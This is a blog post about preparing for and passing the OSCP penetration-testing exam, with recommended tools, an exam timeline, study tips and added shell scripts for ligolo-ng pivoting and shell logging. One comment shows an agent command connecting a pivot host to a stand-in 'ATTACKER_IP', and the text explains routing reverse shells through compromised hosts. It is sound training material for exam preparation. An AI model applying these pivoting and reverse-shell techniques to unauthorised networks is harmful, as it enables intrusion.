OSCP Exam guide: Tools, Tips and Lessons Learned

I just recently passed the OSCP exam and I can tell you all it was a really stressful but rewarding experience. I was full of questions and doubts therefore I decided to make a guide to share my experience and give some advice for anyone who may be in my same position.

My Preparation Process

First off, yes, the exam is challenging (depending on your experience), and you need knowledge in a wide range of topics. This isn’t an exam you can attempt with minimal experience in offensive security or limited practice with CTFs. In my experience, OffSec’s materials are not enough on their own—you’ll want to study from other sources as well. Before the exam, I already held the GPEN (SANS SEC560) certification and had done quite a few CTFs on Hack The Box and Try Hack Me. I also completed OffSec’s Challenge OSCP A, B, and C, as they closely simulate the exam environment.


Notes and Cheatsheets

To keep my notes and cheatsheets organized, I used Obsidian. My approach combined tagging, cross-referencing, and indexing so I could find what I needed quickly. I also made a cheatsheet for every tool I planned to use, and I built a custom GPT for that purpose, which I will share with you:

https://chatgpt.com/g/g-hknlo6ALS-tools-cheatsheet-generator

To use this GPT you just need to write the name of the tool you want the cheatsheet for and it will search online for the most up to date commands list. It will list the sources it accessed and it will output the full cheatsheet in Markdown, so you can just copy paste it in Obsidian (or your favorite editor). The cheatsheet will include a brief explanation of the tool, the most important flags, and several use case examples. Examples use variables (like $attacker or $lport) for IPs and ports, so if you set these as environment variables, you can just copy-paste the commands. (Remember, AI tools aren’t allowed during the exam, so make sure to prepare all cheatsheets in advance!)


Essential Tools (In my opinion)

Here are the tools I relied on and I highly recommend for the exam:


Penelope - https://github.com/brightio/penelope

This is not only a reverse shell handler: it manages multiple sessions, upgrades your shell to a fully interactive TTY when possible, and, among other things, integrates an extremely useful file upload/download feature.


Python Upload Server: https://pypi.org/project/uploadserver/

This server not only serves files for download (like 'python3 -m http.server 8000'), but also lets you upload files to your attack box from a browser on the target machine (it accepts uploads from curl or PowerShell too, so it works from a command-line shell as well). It's incredibly useful when you need to quickly pull files out of an RDP session.


Ligolo-ng - https://github.com/nicocha30/ligolo-ng

Forget about port forwarding, SSH tunneling, Metasploit or proxychains-ng: this is everything you need for pivoting! Super easy to set up and incredibly efficient.
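As an added example (this is my own helper script, not code from the original post or from the ligolo-ng project), the attacker-side ligolo-ng workflow wrapped in shell functions: create the tun interface, start the proxy, validate and add a route for each internal subnet, and print the in-console listener command you need for reverse shells coming back from the pivoted network. Assumptions: the proxy and agent binaries sit in the current directory, the tun interface is called ligolo, the proxy listens on the default 11601/tcp, and the subnet and port values are placeholders. Privileged commands go through run_priv, so DRY_RUN=1 prints them instead of executing them, which is also how you can sanity-check the routes before touching the exam network.

```shell
#!/usr/bin/env bash
# Added example, not from the original post or the ligolo-ng project.
# Assumptions: ./proxy and ./agent in the current directory, tun interface
# "ligolo", proxy on 11601/tcp. DRY_RUN=1 prints privileged commands only.

TUN_IF="${TUN_IF:-ligolo}"
PROXY_PORT="${PROXY_PORT:-11601}"
DRY_RUN="${DRY_RUN:-0}"

# Run a command that needs root, or just print it when DRY_RUN=1.
run_priv() {
    if [ "$DRY_RUN" = "1" ]; then
        echo "sudo $*"
    else
        sudo "$@"
    fi
}

# 1. One-time setup: tun device owned by the current user, then bring it up.
ligolo_prepare_tun() {
    run_priv ip tuntap add user "$(id -un)" mode tun "$TUN_IF"
    run_priv ip link set "$TUN_IF" up
}

# 2. Start the proxy with a self-signed certificate (fine for a lab, not for
#    a client engagement). Then, on the pivot host:
#        ./agent -connect ATTACKER_IP:11601 -ignore-cert
#    and in the proxy console: "session" -> pick the agent -> "start"
#    (older releases call it "tunnel_start").
ligolo_start_proxy() {
    ./proxy -selfcert -laddr "0.0.0.0:${PROXY_PORT}"
}

# 3. After "start", route each internal subnet the agent can reach through the
#    tun. The CIDR is checked first so a typo fails loudly instead of adding a
#    route for the wrong network in the middle of the exam.
ligolo_route() {
    cidr="$1"
    if ! printf '%s' "$cidr" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}/([0-9]|[12][0-9]|3[0-2])$'; then
        echo "ligolo_route: '$cidr' is not an IPv4 CIDR" >&2
        return 1
    fi
    run_priv ip route add "$cidr" dev "$TUN_IF"
}

# 4. Hosts behind the pivot cannot reach your box directly, so a reverse shell
#    from that network needs the agent to listen on the pivot host and forward
#    to your local handler. This prints the command to type in the proxy console.
ligolo_listener_hint() {
    agent_port="$1"
    local_port="$2"
    echo "listener_add --addr 0.0.0.0:${agent_port} --to 127.0.0.1:${local_port}"
}

# Cleanup once the pivot is no longer needed.
ligolo_teardown() {
    run_priv ip link delete "$TUN_IF"
}
```

Typical order: `ligolo_prepare_tun`, `ligolo_start_proxy` in one terminal, the agent on the pivot host, `start` in the proxy console, then `ligolo_route 10.10.10.0/24` for every subnet you discover; point your reverse shells at the pivot host's IP on the port you gave to `listener_add`.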


AutoRecon - https://github.com/Tib3rius/AutoRecon

If you can automate repetitive tasks, you MUST automate them! AutoRecon saves loads of time by running full nmap scans, directory brute-forcing, and more, and it suggests manual follow-up commands based on what it finds. Remember that it runs as root (it needs that for SYN and UDP scans), so the results directory ends up root-owned; change its ownership to your user before you start editing files in it.


Shell logging script - https://sechurity.com/this-custom-script-literally-saved-me-from-failing-oscp/

You really need to have your shells logged. The title of that article is not an exaggeration; I had the same experience. I forgot a couple of screenshots, but I was able to retrieve them thanks to the logs.

I recommend creating one folder per standalone machine and one for the AD set, closing terminals after each and moving logs to the respective folder to stay organized.
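As an added example (my own helpers, not the script linked above and not code from the original post), this does the logging and the per-target organization in one go using util-linux `script`: `log_path` creates one directory per target and returns a timestamped log file name inside it, `logshell` opens a shell that is recorded to that file, and `logs_summary` lists how many sessions you have per target when it is time to write the report. It assumes a Linux attack box with util-linux `script` (Kali ships it) and a log root of ~/oscp/logs (override with LOGROOT); the target names are placeholders you pick to match your notes. The target name is sanitised so a stray value like "../x" cannot write outside the log root.

```shell
#!/usr/bin/env bash
# Added example, not the script linked in the post. Assumes util-linux
# `script` (Linux) and a log root of ~/oscp/logs unless LOGROOT is set.

LOGROOT="${LOGROOT:-${HOME:-/tmp}/oscp/logs}"

# Return <root>/<target>/<target>_<UTC timestamp>.log, creating the target
# directory on the way. Anything outside [A-Za-z0-9._-] becomes "_" and
# leading dots are dropped, so ".." or "../x" stay inside LOGROOT.
log_path() {
    target="$(printf '%s' "$1" | tr -c '[:alnum:]._-' '_' | sed 's/^\.\{1,\}//')"
    [ -n "$target" ] || target="target"
    mkdir -p "${LOGROOT}/${target}"
    printf '%s/%s/%s_%s.log\n' "$LOGROOT" "$target" "$target" "$(date -u +%Y%m%d_%H%M%S)"
}

# Open a logged interactive shell for a target. -f flushes after every write,
# so the log survives a terminal that dies mid-session; -q hides the banner.
logshell() {
    file="$(log_path "$1")"
    echo "[*] logging this session to $file"
    script -q -f "$file"
}

# One line per target with the number of recorded sessions: handy as a
# checklist when you go looking for the screenshot you forgot to take.
logs_summary() {
    for dir in "$LOGROOT"/*/; do
        [ -d "$dir" ] || continue
        printf '%s\t%s\n' "$(basename "$dir")" "$(ls -1 "$dir" | wc -l | tr -d ' ')"
    done
}
```

Source the file from your shell rc and start every terminal for a box with `logshell standalone1` (or `logshell ad`); closing the terminal ends the recording, and the files are already in the right folder.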


How I Approached my Exam

I started my exam at 17:00, dedicating about 7-8 hours to reaching at least 30 points on the standalone machines (you need 70 points in total, and the AD set alone gives you 40). I planned to take screen breaks every 2 hours (if they did not interrupt my workflow) and aimed for at least 6 hours of sleep. I started AutoRecon on the three standalone machines right at 17:00 and targeted the machine with the fewest open ports first. I managed to fully pwn the first host in about 3 to 4 hours (initial access + privilege escalation). At this point I was planning to just get initial access on another host and start the AD set, but luckily I discovered the privilege escalation vector during the enumeration of the second standalone. It took me longer to gain the initial foothold than to escalate privileges XD.

By midnight I had started AutoRecon on the AD set and done some manual enumeration, and I forced myself to bed around 1:00 AM. I rarely slept so badly: I woke up several times and was mostly dreaming about BloodHound (not kidding, I literally dreamed about Python scripts and BloodHound). Around 7:30 my alarm went off, and after walking my dog I immediately got to work on the AD set, taking breaks every 2 hours and sometimes even every hour. By around 15:30 I had completed the AD set, with just enough time left to double-check my screenshots and notes. Since I had to work the next day, I immediately started my final report, wrapping it up around 00:30 and making a few last-minute tweaks during my lunch break the day after.

My key Takeaways for OSCP Success!

Here’s what worked for me, and a few things I would tweak if I could go back:


  • Time off: I took only 2 days off from work for the exam. In hindsight, an extra day just for the report would have been invaluable: your brain is fried after the exam!
  • Take breaks and sleep: This exam is a marathon, so listen to your body. A 15-minute break can give you a fresh perspective on a problem. Sometimes you are simply stuck in the wrong rabbit hole; forcing yourself to stop, take a walk and come back may help you look at things from a different point of view, or try something totally different.
  • Log everything: A shell logging script can literally save your exam. Keep logs organized by session to avoid any last-minute stress.
  • Organize your tools: Have a structured folder with all your tools and exploits. Know where to find what you need right away without hunting.
  • Organize your notes: I used a mix of indexing, folders, and tags in Obsidian. Use what works best for you to keep everything easily accessible.
  • Use aliases: Save time by creating aliases for commonly used commands with multiple arguments such as:

alias autorecon='sudo env "PATH=$PATH" autorecon'

alias penelope='python3 /path/to/penelope.py'

  • Prepare the report during the exam: Take screenshots and notes in a report-like format, saving you time when it’s due. I created separate files for each standalone machine and the AD set.
  • Try Sploitus: Don't rely only on searchsploit, vulndb, GitHub and Google. Try Sploitus as well, https://sploitus.com/ . I was able to find some extra exploits there!


Conclusion

Passing the OSCP is tough, but with the right tools, strategy, and well-timed breaks, it’s doable. Stay calm, keep organized, and pace yourself. Best of luck to anyone taking on this challenge!

If you have questions or found this blog helpful, feel free to reach out. I’d love to hear from you!


Congrats on earning the OSCP certification, Luca C. That's an incredible achievement! If you're looking for your next challenge, check out our hands-on pentesting exams here: https://secops.group/pentesting-exams/


Very informative

Jibin George

Security Analyst @ Prevalent AI | Protecting your digital world, one byte at a time | Cybersecurity Expert | Big Data | CompTIA Security+ | CEH | Elite Hacker @ Hack The Box | Blogger

4 months

Thanks for sharing. Very informative.

Martijn Peijer

Cybersecurity Expert | CTI Coordinator | OSINT | Intelligence Expert

4 months

Congrats Luca, well done!

Antonio Silvestri

Laurea specialistica presso RomaTrePerRoma

4 months

Great!!!!
